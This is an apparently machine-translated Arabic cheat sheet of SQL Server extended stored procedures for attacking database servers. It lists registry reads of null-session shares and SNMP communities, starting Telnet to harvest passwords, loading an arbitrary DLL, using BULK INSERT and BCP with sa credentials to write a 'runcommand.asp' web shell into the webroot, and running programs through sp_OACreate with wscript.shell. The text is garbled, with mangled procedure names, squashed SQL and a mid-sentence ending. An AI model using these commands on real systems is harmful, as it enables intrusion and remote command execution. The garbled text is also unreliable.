بعض الامتدادات SQL
xp_regaddmultistring
xp_regdeletekekekekekekey حذف اسم المفتاح
XP_Regdelevalate Value
xp_regenumkeys enum
XP_REGENMVALUES
xp_regread ل
xp_regremoveMultistring
xp_regwrite الكتابة
xp_availablemedia عرض العرض
XP_Dirrtree العرض دليل
XP_ENUMDSNODBC مصدر بيانات
xp_loginconfig معلومات حول بعض تكوين أمان الخادم
حزمة XP_MAKECAB ، يمكن استخدام بعض أذونات DBO أولاً
XP_NTSEC_ENUMDOMAINS اسم المجال
XP_RETHING_PROCESS TERMINAL و IP
xp_logininfo حساب تسجيل الدخول حاليًا
SP_Configure يسترجع المحتوى في قاعدة البيانات (أعتقد أن هذا مفيد للغاية)
SP_HELPEXTENDENDPROC يحصل على جميع ملحقات التخزين
مستخدمي استعلام SP_WHO2 ، المضيف الذي يقومون بتسجيل الدخول ، والعمليات التي يقومون بها في قاعدة البيانات ، إلخ.
بعض معلومات الشبكة
execxp_regreadhkey_local_machine ،
"النظام/CurrentControlset/Services/Lanmanserver/Parameters" ،
'nullsessionshares'
SNMP مساعدة التدقيق في الشبكة
execxp_regenumvalueshkey_local_machine ،
'System/CurrentControlset/Services/SNMP/Parameters/ValidComm
وحدات
ابدأ بعض خدمات النظام ، مثل Telnet ، ويمكنك القدوم إلى المسؤول أو بعض كلمات مرور النظام.
execmaster..xp_serviceControl'Start '، "الجدول"
execmaster..xp_serviceControl'Start '،' Server '
sp_addextendedproc'xp_webserver '،' c: /temp/xp_foo.dll 'يمكن لهذا الامتداد تشغيل البرنامج
استخدم بناء جملة "Bulkinsert" لإدراج ملف نصي في جدول مؤقت. ببساطة إنشاء هذا الجدول:
CreateTablefoo (LineVarchar (8000))
ثم قم بإجراء عملية BulkInsert لإدخال البيانات في الملف في الجدول ، مثل:
bulkinsertfoofrom'c: /inetpub/wwwroot/admin/inc.asp '
BCP "SELECT*fromtext..foo" queryoutc: /inetpub/wwwroot/runcommand.asp-c-slocalhost-usa-pfoobar
المعلمة 's' هي الخادم الذي ينفذ الاستعلام ، والمعلمة "u 'هي اسم المستخدم ،" p' parmeter هي كلمة المرور ، وهنا "foobar"
يتم توفير العديد من الإجراءات المخزنة المدمجة في SQLServer والتي تسمح بإنشاء البرامج النصية التلقائية ActiveX. هذه البرامج النصية هي نفس البرامج النصية التي تعمل تحت مترجم Windows Script ، أو برامج البرمجة النصية ASP - فهي تستخدم VBScript أو JavaScript لإنشاءها والتفاعل معها. يمكن لبرنامج تنفيذ تلقائي باستخدام هذه الطريقة أن يفعل أي شيء في Transact-SQL في البرامج النصية ASP ، أو في البرامج النصية WSH.
استخدم كائن "wscript.shell" لإنشاء مثيل من المفكرة:
إعلان@oint
execsp_oacreate'wscript.shell '،@oout
execsp_oamethod@o ، 'run' ، null ، 'notepad.exe'
حدد لتنفيذها بعد اسم المستخدم: